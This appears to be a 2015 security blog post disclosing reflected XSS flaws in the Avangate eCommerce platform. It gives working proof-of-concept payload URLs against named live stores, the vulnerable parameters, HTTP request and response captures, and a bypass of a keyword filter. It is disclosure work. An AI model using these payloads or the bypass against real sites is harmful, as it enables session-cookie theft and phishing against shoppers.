Friday, August 28, 2015
Thursday, April 16, 2015
Avangate eCommerce Platform - XSS Vulnerabilities
- Description:
- What is XSS(Cross-Site-Scripting) vulnerability ?
- How can these flaws affect all websites that use Avangate eCommerce solution ?
- Proof of Concept(s): [1] Link: http[s]://subdomain.host.com/redirect.php?url=';alert(1);//
- https://secure.avangate.com/redirect.php?url=';alert(1);//
- https://store.bitdefender.com/redirect.php?url=';alert(1);//
- https://store.iobit.com/redirect.php?url=';alert(1);//
- https://store.kaspersky.ro/partners/?merchant="><script>alert(1)</script>&template="><script>alert(1)</script>
- https://secure2.iolo.com/partners/?merchant="><script>alert(1)</script>&template="><script>alert(1)</script>
- https://shop.metaio.com/partners/?merchant="><script>alert(1)</script>&template="><script>alert(1)</script>
- https://secure.avangate.com/order/checkout.php?SHOPURL=javascriptjavascript:alert(1)
- https://shop.metaio.com/order/checkout.php?SHOPURL=javascriptjavascript:alert(1)
- https://store.kaspersky.ro/order/checkout.php?SHOPURL=javascriptjavascript:alert(1)
Avangate eCommerce Platform suffer from Reflected-XSS(Cross-Site-Scripting) vulnerabilities which can be easily exploited and could allow an attacker to threaten users safety .
Reflected cross-site-scripting vulnerabilities arise when user-input is sent to the webserver in the context of a request and is echoed back into in application’s immediate response in an unsafe way, without being escaped correctly. An XSS attack allows an attacker to insert arbitrary html/javascript content in web pages.
The malicious payload inserted in page can access any cookies, session tokens or other sensitive information retained by victim’s browser and used within that website. It can also rewrite the content of the HTML page and lead to phishing attacks.
Every company that use Avangate platform has to create a separated subdomain (example: SHOP. COMPANY.COM) that must point to a *.avangate.com domain. As the scripts are the same for every website and just subdomain name is different , a vulnerability in the platform will affect all websites that use this product.
(*) Even if this subdomain is used only for online shopping and no loginforms or user sensitive information exists within that website , most of the time web developers prefer to extend cookies validity for all subdomains to gain flexibility. So a session cookie(like “PHPSESSID”) available for host.com could become also valid for shop.host.com (which points to Avangate platform).
Vulnerable parameter: url
Description: redirect.php script will take GET url parameter’s value and will add it in the context of the page without encoding it properly.
PoC:
Example of vulnerable websites:
Request:
GET /redirect.php?url=';alert(1);//
Host: store.bitdefender.com
...
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Jan 2015 15:25:28 GMT
Content-Type: text/html
Content-Length: 65
<script>
document.location.href='http://';alert(1);//';
</script>
[2] Link: http[s]://subdomain.host.com/partners/?merchant="><script>alert(1)</script>&template="><script>alert(2)</script>
Vulnerable parameters: merchant , template
Description: index.php script will take GET merchant, template parameters and will add their values in the context of the page without encoding it properly.
PoC:
Example of vulnerable websites:
Request:
GET /partners/?merchant="><script>alert(1)</script>&template="><script>alert(2)</script>
Host: store.kaspersky.ro
...
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Jan 2015 17:33:14 GMT
Content-Type: text/html
Content-Length: 7821
...
<input type="hidden" name="merchant" value=""><script>alert(1)</script>"/>
<input type="hidden" name="template" value=""><script>alert(2)</script>"/>
[3] Link: https://subdomain.host.com/order/checkout.php?SHOPURL=javascriptjavascript:alert(1)
Vulnerable parameters: SHOPURL
Description:checkout.php script will take GET SHOPURL parameter and will append its value in a href attribute of an a tag. The script will try to prevent the xss attack by removing javascript keyword from the response, but only the first occurrence of this word will be deleted so this filter can be easily bypassed.
PoC:
Example of vulnerable websites:
Request:
GET /order/checkout.php?SHOPURL=javascriptjavascript:alert(1)
Host: store.kaspersky.ro
...
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Jan 2015 17:33:14 GMT
Content-Type: text/html
Content-Length: 7821
...
<a href="javascript:alert(1)">Back to shopping</a>